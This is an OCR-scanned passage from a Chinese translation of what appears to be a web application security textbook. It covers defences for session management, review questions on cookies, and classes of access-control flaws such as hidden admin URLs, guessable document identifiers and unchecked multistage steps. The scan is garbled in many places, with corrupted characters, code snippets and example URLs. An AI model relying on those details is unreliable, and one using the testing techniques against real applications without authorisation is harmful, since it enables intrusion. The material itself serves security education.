攻击 ， 并 确保 如 果 合 法 用 户 和 攻击 者 同时 使 用 一 个 被 劫持 的 会 话 提 出 相 
同 的 请 求 ， 该 请 求 会 立即 被 应 用 程序 终止 。 每 页 面 令 牌 还 可 用 于 退 踪 用 
己 的 位 置 和 在 应 用 程序 中 的 活动 情况 ， 检 测 出 不 按 预 定 顺 序 访问 茶 些 功 
能 的 企图 ， 并 有 助 于 防止 芭 些 访问 控制 缺陷 (请 参阅 第 8 章 了 解 相关 内 
容 ) 。 











应 用 程序 的 会 话 管理 功能 应 与 它 的 日 志 、 监 控 与 警报 机 制 紧密 结 
合 ， 以 提供 适当 的 反常 行为 记录 ， 并 帮助 管理 员 在 必要 时 采取 防御 措 
fio 

a 应 用 程序 应 监控 包含 无 效 令 牌 的 请 求 。 除 非 令 牌 很 容易 被 预测 ， 
人 否则， 攻击 者 就 需要 提出 大 量 包 合 无 效 令 牌 的 请 求 ， 才 能 成 功 猜 测 出 应 
A 留 下 明显 的 痕 
迹 。 

口 很 难 完 全 阻止 针对 会 话 令 牌 的 蛮 力 攻击 ， 因 为 我 们 无 法 通过 蔡 
特殊 用 户 账 户 或 会 话 来 终止 这 种 攻击 。 一 种 可 能 的 防御 方法 是 在 收 到 大 
量 包 含 无 效 令 牌 的 请 求 时 将 其 来 源 IP 地 址 屏蔽 一 段 时 间 。 然 而 ， 如 果 一 
个 用 户 的 请 求 来 自 几 个 下地 址 〈 如 AOL 用 户 ) ， 或 者 几 个 用 户 的 请 求 来 





tu 





目 同一 个 下地 址 《如 执行 网 络 地 址 转换 的 代理 服务 器 或 防火 墙 中 的 用 
F) ， 这 种 方法 就 不 能 发 挥 太 大 的 作用 。 

口 即 使 无 法 立即 有 效 防 正 针 对 会 话 的 蛮 力 攻击 ， 但 保留 详细 的 日 志 
并 问 管 理 员 发 出 警报 仍然 可 帮助 他 们 对 攻击 进行 调查 ， 并 尽 其 所 能 采取 
适当 的 行动 。 

口 只 要 有 可 能 ， 应 同 用 户 警 告 与 会 话 有 关 的 反 第 事件 ， 例 如 并 行 登 
录 或 明显 的 动 持 攻击 (使 用 每 页 面 令 牌 检测 ) 。 即 使 用 户 的 令 牌 已 被 攻 
A gee rd eet recog ete 


反应 性 会 话 终止 

会 话 管理 机 制 可 非常 有 效 地 防御 许多 针对 应 用 程序 的 其 他 攻击 。 如 
果 收 到 用 户 提 交 的 反常 请 求 〈 例 如 ， 任 何 包 含 被 修改 的 隐藏 HTML 表 单 
字段 或 URL 查 询 字符 串 参 数 的 请 求 、 任 何 包含 与 5QL 注 入 或 跨 站 点 脚本 
攻击 有 关 的 字符 串 请 求 ， 以 及 任何 正 常 情况 下 已 经 被 长 度 限 制 之 类 的 客 
户 端 检查 阻止 的 用 户 输入 〉， 那 么 一 些 安全 性 至 关 重 要 的 应 用 程序 (如 
电子 银行 ) 会 极其 迅速 地 终止 用 户 的 会 话 。 

当然 ， 任 何 使 用 这 类 请 求 可 对 其 加 以 利用 的 漏洞 都 必须 从 源头 进行 
清除 。 但 是 ， 迫 使 用 户 每 次 提交 一 个 无 效 请 求 时 都 需要 进行 重新 验证 ， 
这 会 显著 延长 探查 应 用 程序 漏洞 所 需 的 时 间 ， 即 使 采用 自动 技巧 完成 这 
0 E 
IJ. 

如 末 执 行 这 种 防御 ， 为 方便 测试 ， 建 议 在 需要 时 可 轻易 将 其 关闭 。 
如 果 在 对 应 用 程序 进行 合法 渗透 测试 时 ， 这 种 防御 就 像 是 遇 到 真正 的 攻 
击 者 那样 减缓 应 用 程序 的 啊 应 速度 ， 那 么 它 的 效率 就 会 显著 降低 。 与 不 
使 用 这 种 机 制 相 比 ， 使 用 它 很 可 能 会 在 代码 中 造成 更 多 的 漏洞 。 






































渗透 测试 步 又 


如 果 所 攻击 的 应 用 程序 使 用 这 种 防御 机 制 ， 渗 透 测试 员 可 能 发 
现在 应 用 程序 中 探查 各 种 常见 的 漏洞 非常 费时 ， 每 次 测试 失败 后 都 
需要 再 次 登录 并 重新 导航 到 正在 分 析 的 位 置 ， 因 此 不 久 后 就 会 主动 
放弃 攻击 。 

这 种 烦恼 可 以 使 用 自动 工具 来 解除 。 当 使 用 Burp Intruder 发 动 
攻击 时 ， 可 以 使 用 “获取 cookie”(Obtain Cookie) 特性 在 每 次 测试 
前 重新 登录 ， 并 使 用 新 的 会 话 令 牌 〈 只 要 应 用 程序 采用 单 阶段 登 录 
机 制 ) 。 当 手动 浏览 和 探查 应 用 程序 时 ， 可 以 通过 IBurpExtender 接 
口 使 用 Burp Proxy 的 扩展 性 特性 。 渗 透 测试 员 可 以 建立 一 个 扩展 ， 
检测 应 用 程序 何 时 执行 强制 退出 、 自 动 登录 到 应 用 程序 并 将 新 会 话 
和 页 面 返 回 给 浏览 器 ， 同 时 选择 使 用 弹出 消息 通知 所 发 生 的 一 切 。 
虽然 使 用 这 种 方法 并 不 能 完全 解雇 这 个 问题 ， 但 在 某 些 情况 下 能 显 
著 减 轻 它 造成 的 影 啊 。 
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攻击 者 在 攻击 应 用 程序 时 ， 会 话 管理 机 制 中 存在 的 诸多 漏洞 为 他 们 
提供 了 大 量 的 攻击 目标 。 鉴 于 其 在 多 个 请 求 中 确定 相同 用 户 身 份 过 程 中 
所 发 挥 的 重要 作用 ， 不 完善 的 会 话 管理 功能 通常 会 成 为 攻击 者 “进入 应 
用 程序 王国 的 钥 古 ”。 对 攻击 者 来 说 ， 进 入 其 他 用 户 的 会 话 当然 不 错 ， 
但 劫持 管理 员 的 会 话 会 更 好 ， 因 为 这 样 他 往往 能 够 攻破 整个 应 用 程序 。 

现实 世界 的 会 话 管理 功能 中 往往 存在 各 种 各 样 的 缺陷 。 当 应 用 程序 
采用 定制 机 制 时 ， 其 中 可 能 会 存在 各 种 薄弱 环节 ， 并 有 无 数 种 攻击 方法 
可 供 攻 击 者 利用 。 耐 心 与 坚持 不 懈 是 我 们 从 中 汲取 到 的 最 重要 的 教训 。 
许多 会 话 管理 机 制 初 看 起 来 似乎 安全 可 靠 ， 但 仔细 分 析 后 却 发 现 它 们 并 
不 合格 。 解 译 应 用 程序 如 何 生 成 看 似 随机 的 令 牌 序列 ， 这 个 过 程 既 费时 
a a a a 
[精力 。 














欲 知 问题 答案 ， 请 访问 http:/mdsec.net/wahh。 
(1) 登录 一 个 应 用 程序 后 ， 服 务 器 建立 以 下 cookie: 


Set-cookie: sessid=amltMjM6MTIOMToxMTk0ODcwODYz; 
一 个 小 时 后 ， 再 次 登录 并 得 到 以 下 cookie: 
Set-cookie: sessid=amltMjJM6MTIOMToxMTkOODc1IMTMy ; 


通过 这 些 cookie， 可 以 得 出 什么 推论 ? 

(2) 某 个 应 用 程序 使 用 由 6 个 字符 组 成 的 数字 字母 会 话 令 牌 和 由 5 
个 字符 组 成 的 数字 字母 密码 。 它 们 全 都 由 某 种 无 法 预测 的 算法 随机 生 
成 。 其 中 哪 一 个 最 有 可 能 成 为 蛮 力 猜测 攻击 的 目标 ? 列 出 影响 你 做 出 决 
策 的 各 种 不 同 因素 。 

(3) 登录 位 于 以 下 URL 的 一 个 应 用 程序 : 


https://foo.wahh-app.com/login/home.php 


服务 器 建立 以 下 cookie: 


Set-cookie: sessionId=1498172056438227; domain=foo.wahh- 
app.com; path=/login; HttpOnly; 
然后 访问 下 面 的 URL。 浏 览 器 会 将 sessionId cookie 提 交 给 哪些 URL? 
( 选 出 全 部 答案 。) 
Ca) https://foo.wahh-app.com/login/myaccount.php 
(b) https://bar.wahh-app.com/login 
(c) https://staging.foo.wahh-app.com/login/home.php 
(d) http://foo.wahh-app.com/login/myaccount.php 
Ce) http://foo.wahh-app.com/logintest/login.php 
(f) https://foo.wahh-app.com/logout 
(g) https://wahh-app.com/login/ 
(Ch) https://xfoo.wahh-app.com/login/myaccount.php 
(4) 所 针对 的 应 用 程序 除 使 用 主 会 话 令 牌 外 ， 还 使 用 每 页 面 令 
牌 。 如 果 收 到 一 个 不 按 顺 序 发 送 的 每 页 面 令 牌 ， 整 个 会 话 将 被 终 止 。 假 
设 及 现 了 茶 种 缺陷 ， 可 通过 它 预 测 或 截获 应 用 程序 发 布 给 当前 正在 访问 
应 用 程序 的 其 他 用 户 的 令 牌 。 那 么 能 够 动 持 他 们 的 会 话 吗 ? 
(5) 登录 一 个 应 用 程序 后 ， 服 务 器 建立 以 下 cookie: 











Set-cookie: sess=ab11298f7eg14; 
单 击 “ 退 出 ”按钮 后 ， 应 用 程序 执行 以 下 客户 端 脚 本 : 


document .cookie="sess="; 





document. location="/"; 


过 这 种 行为 ， 可 以 得 出 什么 结论 ? 





O AER, Hi e HAEARN ERNER. 信息 量 越 
体系 结构 越 规则 ， 功 能 越 完善 ， 炳 残 越 小 。 一 一 译 者 注 

雪 朋 效应 ， 加 密 算 法 的 一 种 特征 ， 指 明文 或 密 钥 的 少量 变化 会 引起 密 
文 的 很 大 变化， 一 一 详 者 注 


从 思 辑 上 潮 ， 应 用 程序 核心 安全 机 制 的 访 间 控制 建立 在 验证 和 会 
话 管理 之 上 。 到 现在 为 止 ， 我 们 已 经 了 解 了 应 用 程序 如 何 首 先 核实 用 户 
的 身份 ， 然 后 确认 它 收 到 的 某 个 特殊 的 请 求 序列 由 该 用 户 提出 。 应 用 程 
序 之 所 以 需要 这 样 做 ， 至 少 从 安全 上 讲 ， 是 因为 它 必 须 决 定 是 知人 允许 某 
个 请 求 执行 特定 的 操作 或 访问 它 请 求 的 资源 。 仿 问 控制 是 应 用 程序 的 一 
个 重要 防御 机 制 ， 因 为 它们 负责 做 出 这 些 关键 决定 。 如 果 访问 控制 存在 
缺陷 ， 攻 击 者 往往 能 各 攻 破 整个 应 用 程序 ， 控 制 其 管理 功能 并 访问 属于 
其 他 用 户 的 敏感 数据 。 

如 第 1 章 所 述 ， 不 完善 的 访问 控制 中 最 常见 的 Web 应 用 程序 漏洞 ， 
影响 了 我 们 最 近 测 试 的 71% 的 应 用 程序 。 我 们 发 现 应 用 程序 做 出 一 切 努 
力 执 行 稳定 的 验证 与 会 话 管理 机 制 ， 但 由 于 没有 在 它们 上 面 建立 任何 有 
效 的 访问 控制 ， 因 而 浪费 了 这 方面 的 投资 ， 这 种 情况 非常 常见 。 这 些 漏 
洞 如 此 普遍 的 一 个 原因 在 于 ， 需 要 对 每 一 个 请 求 ， 以 及 特殊 用 户 在 特定 
时 刻 党 试 对 资源 执行 的 每 二 项 操作 执行 访问 控制 检查 。 而 且 ， 与 许多 其 
他 类 型 的 控制 不 同 ， 这 一 疫 计 次 策 需要 由 人 做 出 ， 而 无 法 采 用 技术 来 
{Reo 

访问 控制 漏洞 的 概念 非常 简单 ， 应 用 程序 允许 攻击 者 执行 革 种 攻击 
者 没有 资格 执行 的 操作 ”各 种 漏洞 之 间 的 差异 实际 上 可 归结 为 这 些 核心 
漏洞 表现 方式 上 的 不 同 ， 以 及 检测 它们 所 需要 使 用 的 技巧 之 间 的 差异 。 
我 们 将 描述 所 有 这 些 技巧 ， 讨 论 如 何 利用 应 用 程序 的 各 种 不 同行 为 ， 执 
行 未 授权 操作 并 访问 受 保护 的 数据 。 























访问 控制 可 分 为 三 大 类 : 垂直 访问 控制 、 水 平 访问 控制 和 上 下 文 相 
天 的 访问 控制 。 

垂直 访问 控制 允许 各 种 类 型 的 用 户 访 问 应 用 程序 的 不 同 功能 。 在 了 基 
简单 的 情况 下 ， 应 用 程序 通过 这 种 控制 界定 普通 用 户 和 管理 员 。 在 更 加 
复杂 的 情况 下 ， 垂 十 访问 控制 可 能 需要 界定 多 许 其 访问 特殊 功能 的 各 种 
a a a 


水 平 访问 控制 允许 用 户 访问 一 组 相同 类 型 的 、 内 容 极其 广泛 的 资 
源 。 例 如 ，Web 邮 件 应 用 程序 允许 访问 自己 而 非 他 人 的 电子 邮件 ; 电子 
银行 只 允许 转移 自己 账户 内 的 资金 ， 工 作 流 程 应 用 程序 允许 更 新 分 配给 
你 的 任务 ， 但 只 能 阅读 分 配给 他 人 的 任务 。 

上 下 文 相关 的 访问 控制 可 确保 基于 应 用 程序 当前 的 状态 ， 将 用 户 访 
问 仪 限于 所 允许 的 内 容 。 例 如 ， 如 果 在 茶 个 过 程 中 ， 用 户 需 要 完成 多 个 
阶段 的 操作 ， 上 下 文 相关 的 访问 控制 可 以 防止 用 户 不 按 规 定 的 顺序 访问 
这 些 阶段 。 

许多 时 候 ， 垂 直 与 水 平 访问 控制 相互 交合 。 例 如 ， 企 业 资 源 规 划 应 
用 程序 允许 每 个 应 付 账 会 计 文 员 文 付 茶 一 个 组 织 单元 、 而 非 其 他 单元 的 
发 票 ， 但 允许 应 付 账 经 理 文 付 任何 单元 的 发 票 。 同 样 ， 会 计 文 员 只 能 文 
付 小 额 发票 ， 而 大 额 文 票 必须 由 经 理 文 付 。 财 务 总 监 可 以 查看 公司 每 个 
组 织 单元 的 发 票 文 付 和 收据 ， 但 不 得 文 付 任何 发 票 。 

如 采用 户 能 够 访问 他 无 权 访 问 的 功能 或 资源 ， 束 表示 访问 控制 存在 
缺陷 。 主 要 有 三 种 类 型 的 以 访问 控制 为 目标 的 攻击 ， 分 别 与 三 种 访问 控 
制 相对 应 。 

O 如 果 一 名 用 户 能 够 执行 某 项 功能 ， 但 分 配给 他 的 角色 并 不 具有 这 
种 权限 ， 束 表示 出 现 垂直 权限 提升 漏洞 。 例 如 ， 如 果 一 名 普通 用 户 能 够 
执行 管理 功能 ， 或 者 一 位 会 计 文 员 能 够 文 付 任何 金额 的 发 昧 ， 就 表示 访 
问 控制 并 不 完善 。 

口 如 果 一 名 用 户 能 够 查看 或 修改 他 没有 资格 全 看 或 修改 的 资源 ， 就 
表示 出 现 水 平权 限 提升 漏洞 。 例 如 ， 如 果 用 户 能 使 用 web 邮件 应 用 程序 
阅读 他 人 的 电子 邮件 ， 或 者 如 果 一 位 会 计 文员 可 以 处 理 自 己 所 属 组 织 单 
元 以 外 的 单元 的 发 票 ， 那 么 访问 控制 也 不 完善 。 

口 如 果 用 户 可 以 利用 应 用 程序 状态 机 中 的 漏洞 获得 关键 资源 的 访问 
权限 ， 就 表示 出 现 业务 馆 辑 漏 铜 。 例 如 ， 用 户 能 够 避 开 购物 结算 序列 中 




















的 文 付 步 又 。 

许多 时 候 ， 应 用 程序 水 平权 限 划分 中 存在 的 漏洞 可 能 会 立即 引起 垂 
直 权 限 提升 攻击 。 例 如 ， 如 宁 一 名 用 户 能 够 以 茶 种 方式 设置 其 他 用 户 的 
密码 ， 那 么 该 用 户 就 能 攻击 管理 员 的 账户 并 控制 整个 应 用 程序 。 

在 我 们 已 经 描述 的 示例 中 ， 不 完善 的 访问 控制 使 获得 茶 种 用 户 权 限 
的 攻击 者 能 够 执行 未 授权 操作 或 访问 未 授权 数据 。 但 是 ， 在 最 严重 的 情 
况 下 ， 不 完善 的 访问 控制 可 能 允许 完全 未 获 授权 的 用 户 访 问 只 有 特权 用 
户 才 能 访问 的 功能 或 数据 。 


8.1.1 完全 不 受 保护 的 功能 


在 许多 的 访问 控制 不 完善 情况 下 ， 敏 感 功 能 和 数据 可 被 任何 知道 相 
关 URL 的 用 户 访问 。 例 如 ， 在 许多 应 用 程序 中 ， 任 何人 只 需 访 问 一 个 特 
定 的 URL 就 能 够 完全 控制 它 的 管理 功能 : 


https://wahh-app.com/admin/ 


FER OLR MAIE EA SRE F am: 以 管理 员 寻 份 
登录 的 用 户 在 他 们 的 用 户 界 面 上 看 到 一 个 该 URL 的 链接 ， 而 其 他 用 户 则 
无 法 看 到 这 个 链接 。 这 种 细微 的 差别 是 应 用 程序 用 于 “防止 ”敏感 功能 被 
未 授权 使 用 的 唯一 机 制 。 

有 了 时候， 人 允许 用 户 访问 强大 功能 的 URL 可 能 很 难 猜 测 ， 甚 至 可 能 相 
当 隐 秘 ， 例 如 : 

https: //wahh-app.com/menus/secure/f£457/DoAdminMenu2 .jsp 

这 种 情况 下 ， 开 发 者 假设 攻击 者 无 法 知道 或 上 友 现 这 个 URL， 管 理 功 
能 束 会 因此 受到 保护 。 当 然 ， 局 外 人 很 难 攻 破 一 个 应 用 程序 ， 因 为 他 们 
不 太 可 能 猜测 出 实现 这 种 目的 的 URL。 














w 错误 观点 “ 低 权 限 用 户 并 不 知道 那个 URL。 我 们 并 没有 在 
应 用 程序 中 引用 它 。” 

在 前 面 的 示例 中 ， 无 论 URL 多 么 容易 猜测 ， 不 存在 任何 真 

正 的 访问 控制 仍然 等 同 于 一 个 严重 的 漏洞 。 不 管 是 在 应 用 程序 

还 是 在 用 户 手 中 ，URL 都 不 具有 保密 性 。 它 们 显示 在 屏幕 上 ， 

出 现在 浏览 器 历史 记录 与 Web 服 务 器 和 代理 服务 器 的 日 志 中 。 

用 户 可 能 会 记 下 它们 ， 以 它们 为 书签 或 通过 电子 邮件 将 其 四 处 








传播 。 与 密码 不 同 ， 它 们 一 般 不 需要 定期 修改 。 当 用 户 的 工作 
职位 发 生 改 变 、 需 要 收回 他 们 的 管理 权限 时 ， 我 们 并 没有 办 法 
从 他 们 的 记忆 中 删除 茶 个 特殊 的 URL。 


一 些 应 用 程序 的 敏感 功能 隐藏 在 各 种 不 太 容 易 猜 测 的 URL 之 后 ， 但 
攻击 者 通过 仔细 检 碍 客户 端 代 码 仍 能 发 现 这 些 URL。 许 多 应 用 程序 使 用 
JavaScript 在 客户 端 动态 建立 用 户 界 面 。 它 一 般 建 立 各 种 与 用 户 状 态 有 关 








的 标记 ， 然 后 根据 这 些 标记 在 用 户 界面 〈UI) 中 增加 不 同 的 元 素 。 例 
如 : 
var isAdmin = false; 
is (isddmin) 
adminMenu.addItem("/menus/secure/ff£457/addNewPortralUser2.jsp", 


“create a new user"); 


} 


在 这 个 示例 中 ， 攻 击 者 只 需 检 查 JavaScript 代 人 码 就 可 确定 具备 管理 功 
能 的 URL， 并 尝试 访问 它们 。 在 其 他 情况 下 ，HTML 注 释 中 可 能 包含 屏 
秦 显 示 内 容 中 没有 链接 的 URL 的 引用 或 线索 。 请 参阅 第 4 半 了 解 攻 击 者 
收集 应 用 程序 中 隐藏 内 容 信息 时 使 用 的 各 种 技巧 。 

直接 访问 方法 

如 果 应 用 程序 披露 实际 用 于 远程 调用 APT 方 法 的 URL 或 参数 〈 通 党 
它们 由 Java 界 面 披露 ) ， 这 时 可 能 出 现 功能 不 受 保护 的 特例 。 在 将 服务 
器 端 代码 移 至 浏览 器 扩展 组 件 ， 并 创建 方法 存根 以 便 代 人 码 仍然 能 够 调用 
它 正 常 运行 所 需 的 服务 器 端 方法 时 ， 往 往 会 发 生 这 种 特例 。 除 以 上 情形 
外 ， 如 果 URL 或 参数 使 用 getBalance 和 isExpired 等 标准 Java 命 名 约定 ， 这 
时 也 可 能 会 出 现 直 接 调用 方法 的 情况 。 

原则 上 ， 与 指定 服务 器 端 脚本 或 其 他 资源 的 请 求 相 比 ， 并 不 需要 完 
全 确保 指定 要 执行 的 服务 器 端 API 的 请 求 的 安全 。 但 实际 上 ， 这 种 机 制 
往往 包含 漏洞 。 通 党 ， 客 户 端 直接 与 服务 器 端 API 方 法 交互 ， 并 避 开 应 
用 程序 的 正常 访问 控制 或 意外 输入 回 量 。 如 果 其 他 功能 从 不 由 Web 应 用 
程序 客户 端 直接 调用 ， 则 这 些 功能 也 可 以 通过 上 述 方法 调用 ， 并 不 受 任 
何 控制 的 保护 。 一 般 情况 下 ， 用 户 只 需要 能 够 访问 某 些 特定 的 方法 ， 但 
他 们 却 拥 有 访问 所 有 方法 的 权限 。 出 现 这 种 情况 ， 或 者 是 因为 开发 者 并 
不 了 解 用 户 到 底 需 要 哪些 方法 ， 因 而 同 他 们 提供 所 有 方法 的 访问 权限 ; 
ae a 映射 到 HTTP 服 务 器 的 API 默 认 提 供 访问 所 有 方法 的 权 
限 。 

以 下 示例 显示 了 如 何 从 接口 securityCheck 中 调用 getCurrentUserRoles 






































AJ $, 
方法 : 
http: //wahh-app.com/public/securityCheck/getCurrentUserRoles 


在 此 示例 中 ， 除 了 测试 对 getCurrentUserRoles 方 法 的 访问 控制 外 ， 
还 应 检查 是 否 存 在 其 他 类 似 命 名 的 方法 ， 如 getAllUserRoles、 
getAllRoles、getAllUsers 和 getCurrentUserPermissions。 我 们 将 在 本 章 后 
面部 分 进一步 讨论 如 何 测 试 直接 访问 方法 的 情况 。 


8.1.2 ”基于 标识 符 的 功能 


当 应 用 程序 使 用 一 项 功能 访问 某 个 特殊 的 资源 时 ， 被 请 求 资 源 的 标 
识 符 常常 以 请 求 参 数 的 形式 、 在 URL 查 询 字符 串 或 POST 请 求 主 体 中 提 
交 给 服务 器 。 例 如 ， 应 用 程序 可 能 使 用 下 面 的 URL 显 示 一 份 属于 某 个 用 
户 的 特殊 文档 : 

at.tps://wahh-app.com/ViewDooument .ckhr?decid=12#0149120 

拥有 这 份 文档 的 用 户 登 录 后 ， 这 个 URL 的 链接 将 会 在 该 用 户 的 “我 

的 文档 ”页 面 显 示 。 其 他 用 户 无 法 看 到 这 个 链接 。 但 是 ， 如 果 访 问 控制 
a 那么 请 求 相应 URL 的 任何 用 户 都 能 够 像 授 权 用 户 那 样 查 看 这 份 

文档 。 




















VY ”提示 当主 应 用 程序 连接 一 个 外 部 系统 或 后 端 组 件 时 通常 
会 出 现 这 类 漏洞 。 可 能 很 难 在 使 用 各 种 技术 的 不 同系 统 之 间 共 至 一 
个 基于 会 话 的 安全 模型 。 面 对 这 种 问题 ， 开 发 者 往往 会 避免 使 用 那 
种 模型 ， 而 使 用 客户 端 提交 的 参数 做 出 访问 控制 决定 。 


在 这 个 示例 中 ， 寻 求 获得 未 授权 访问 的 攻击 者 不 仅 需 要 知道 应 用 程 
序 页 面 的 名 称 CView-Document.php) ， 而 且 需 要 知道 他 想 要 查看 的 文 
档 的 标识 符 。 有 时 ， 应 用 程序 生成 的 资源 标识 符 非 常 难以 预测 ， 例 如 ， 
它们 可 能 是 随机 选择 的 GUID (Global Unique Identifier， 全 局 统一 标识 
fF) 。 在 其 他 情况 下 ， 它 们 可 能 很 容易 猜测 ， 例 如 ， 它 们 可 能 是 连续 生 
成 的 数字 。 但 是 ， 无 论 是 哪 一 种 情况 ， 应 用 程序 都 易于 遭受 攻击 。 如 前 
所 述 ，URL 并 不 具有 保密 性 ， 资 源 标识 符 也 同样 如 此 。 通 常 ， 希 望 发 现 
其 他 用 户 资源 标识 符 的 攻击 者 可 在 应 用 程序 的 某 个 位 置 找到 这 些 信 息 ， 
例如 访问 日 志 中 。 即 使 在 应 用 程序 的 资源 标识 符 很 难 狂 测 的 情况 下 ， 如 

















果 没 有 对 那些 资源 实施 合理 的 访问 控制 ， 它 们 仍然 易于 受到 攻击 。 如 果 
标识 符 很 容易 预测 ， 问 题 残 会 更 加 严重 ， 也 更 容易 被 攻击 者 所 利用 。 











vV 提示 应 用 程序 日 志 通 常 是 一 个 信息 金 矿 ， 其 中 包含 大 量 
可 被 用 作 标 识 符 的 数据 项 ， 可 利用 它们 探查 通过 标识 符 访问 的 功 
能 。 应 用 程序 日 志 中 常见 的 标识 符 包 括 : 用 户 名 、 用 户 ID、 账 号 、 
文档 ID、 用 户 群 组 与 角色 以 及 电子 邮件 地 址 。 


—\7 


=> Ef 除 用 于 指 代 应 用 程序 中 基于 数据 的 资源 外 ， 这 种 标 
识 符 还 常用 于 表示 应 用 程序 功能 。 如 第 4 章 所 述 ， 应 用 程序 可 以 通 
过 单独 一 个 页 面 提供 各 种 功能 ， 它 接受 一 个 功能 名 称 或 标识 符 为 参 
数 。 同 样 ， 在 这 种 情况 下 ， 应 用 程序 也 只 是 在 各 种 类 型 的 用 户 界面 
中 显示 或 隐藏 一 个 特殊 的 URL， 实 施 肤浅 的 访问 控制 。 如 果 攻 击 者 
能 够 确定 茶 一 敏感 功能 的 标识 符 ， 他 束 能 像 拥 有 高 级 权限 的 用 户 一 
样 访问 该 功能 。 





8.1.3 介 段 功能 


应 用 程序 的 许多 功能 通过 几 个 阶段 执行 ， 并 在 执行 过 程 中 由 客户 器 
加 服务 器 发 送 许多 请 求 。 例 如 ， 添 加 新 用 户 功 能 可 能 包括 从 用 户 维护 沫 
单 中 选取 这 个 选项 ， 从 下 拉 列 表 中 选择 部 门 和 用 户 职 位 ， 然 后 输入 新 用 
户 名 、 初 始 密 码 和 其 他 信息 。 

许多 应 用 程序 常 第 会 努力 防止 这 种 敏感 功能 被 未 授权 访问 ， 但 由 于 
其 误解 了 这 种 功能 的 使 用 方式 ， 因 而 实施 了 不 完善 的 访问 控制 。 

在 前 面 的 示例 中 ， 如 果 一 名 用 户 试图 加 载 用 户 维护 染 单 并 从 中 选 
取 “ 添 加 新 用 户 ” 选 项 ， 应 用 程序 就 会 核实 该 用 户 是 否 拥 有 必要 的 权限 ， 
如 果 用 户 未 获 授 权 ， 残 阻止 其 进行 访问 。 但 是 ， 如 果 攻 击 者 直接 进入 核 
实用 户 所 属 部 门 和 其 他 细 市 的 阶段 ， 可 能 就 没有 有 效 的 访问 控制 对 其 加 
以 限制 。 开 发 者 认为 ， 任 何 到 达 验 证 过 程 后 续 阶 段 的 用 户 一 定 已 经 拥有 
相关 的 权限 ， 因 为 前 面 的 阶段 已 经 验证 了 这 些 权 限 。 通 过 这 种 方法 ， 任 











何 应 用 程序 用 户 都 能 够 添加 一 个 新 的 管理 用 户 账 尸 ， 因 而 完全 控制 整个 
应 用 程序 ， 访 问 许 多 其 他 已 经 实施 完善 的 访问 控制 的 功能 。 

即使 在 许多 电子 银行 使 用 的 安全 性 能 很 关键 的 Web 应 用 程序 中 ， 我 
们 也 曾经 发 现 这 种 类 型 的 漏洞 。 在 银行 应 用 程序 中 ， 转 账 通 党 包括 几 个 
阶段 ， 部 分 原因 是 为 了 防止 用 户 在 请 求 转账 时 无 意 出 错 。 这 个 多 阶段 过 
程 需 要 在 每 个 阶段 收集 各 种 与 用 户 有 关 的 数据 。 这 些 数 据 在 初次 提交 后 
将 接受 严格 检查 ， 然 后 使 用 HTML 表 单字 段 送 交 给 随后 的 阶段 。 但 是 ， 
如 果 应 用 程序 并 不 在 最 后 阶段 重新 确认 这 些 数据 ， 攻 击 者 就 可 能 会 避 开 
服务 器 检查 。 例 如， 应 用 程序 可 能 会 核实 进行 转账 的 来 源 账户 是 否 属 于 
当前 用 户 ， 然 后 询问 与 目的 账户 有 关 的 细节 和 转账 的 金额 。 如 采用 户 拦 
截 这 个 过 程 中 的 最 后 一 个 POST 请 求 ， 并 修改 来 源 账 号， 他 就 能 实现 水 
平权 限 提 升 ， 从 其 他 用 户 的 账户 中 转移 资金 。 


8.1.4 BA TE 
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布 请 求 来 访问 受 保护 的 功能 和 资源 。 这 时 ， 每 个 动态 页 面 负责 执行 适当 
的 访问 控制 检查 ， 并 确认 用 户 拥 有 执行 相关 操作 所 需 的 权限 。 

但 是 ， 有 些 时 候 ， 用 户 会 直接 同位 于 服务 器 Web 根 目录 下 的 静态 资 
源 提出 请 求 ， 要 求 访问 这 些 受 保护 的 资源 。 例 如 ， 一 个 在 线 出 版 商 允 许 
用 户 浏 览 他 的 书籍 目录 并 购买 电子 书 进行 下 载 。 文 付费 用 后 ， 应 用 程序 
就 将 用 户 指 癌 以 下 下 载 URL: 


https: //wahh-books.com/download/ 9780636628104 .pdf 


因为 这 是 一 个 完全 静态 的 资源 ， 所 以 它 并 不 在 服务 右上 运行 ， 它 的 
内 容 直 接 由 Web 服 务 右 返回 。 因 此 ， 资 源 自 身 并 不 能 执行 任何 检查 以 确 
认 提 出 请 求 的 用 户 拥 有 必要 的 权限 。 如 果 可 以 通过 这 种 方式 访问 静态 资 
源 ， 那 么 这 些 资源 很 可 能 没有 受到 有 效 的 访问 控制 机 制 的 保护 ， 任 何 知 
晓 URL 命 名 方案 的 人 都 可 以 利用 这 种 缺陷 访问 任何 所 需 的 资源 。 在 上 面 
的 示例 中 ， 文 档 名 称 似乎 是 一 个 ISBN， 利 用 这 个 信息 ， 攻 击 者 能 够 任 
意 下 载 由 该 出 版 商 制作 的 每 一 本 电子 书 。 

菏 些 功能 特别 容易 出 现 这 种 问题 ， 包 括 提供 公司 年 度 报 表 之 类 静态 
文档 的 金融 Web 站 点 、 提 供 可 下 载 二 进 制 代 码 的 软件 供应 商 以 及 通过 其 
访问 应 用 程序 中 静态 日 志文 件 和 其 他 敏感 数据 的 管理 功能 。 


8.15 平台 配置 错误 























一 些 应 用 程序 在 Web 服 务 器 或 应 用 程序 平台 层 使 用 控件 来 控制 访 
问 。 通 常 ， 应 用 程序 会 根据 用 户 的 角色 来 限制 对 特定 URL 路 径 的 访问 。 
例如 ， 如 果 用 户 不 属于 “管理 员 ” 组 ， 访 问 /admin 路 径 的 请 求 可 能 会 遭 到 
拒绝 。 原 则 上 ， 这 是 完全 合法 的 访问 控制 方法 。 但 是 ， 如 果 在 配置 平台 
级 控件 时 出 现 错误 ， 这 时 就 可 能 导致 未 授权 访问 。 

正常 情况 下 ， 平 台 级 配置 与 防火 墙 策略 规则 类 似 ， 它 们 其 于 以 下 条 
件 人 允许 或 拒绝 访问 请 求 : 

口 HITP 请 求 方法 ; 

口 URL 路 径 ; 

口 用 户 角 色 。 

如 第 3 章 所 述 ，GET 方 法 的 最 初 目的 是 检索 信息 ， 而 POST 方法 的 目 
的 是 执行 更 改 应 用 程序 的 数据 或 状态 的 操作 。 

如 果 没 有 小 心 制定 规则 ， 以 基于 正确 的 HITP 方 法 和 URL 路 径 允 许 
访问 ， 就 可 能 会 导致 未 授权 访问 。 例 如 ， 如 果 用 于 创建 新 用 户 的 管理 功 
能 使 用 POST 方法 ， 平 台 可 能 具有 禁止 POST 方法 并 允许 所 有 其 他 方法 的 
拒绝 规则 。 但 是 ， 如 果 应 用 程序 级 脚本 并 不 验证 针对 此 功能 的 所 有 请 求 
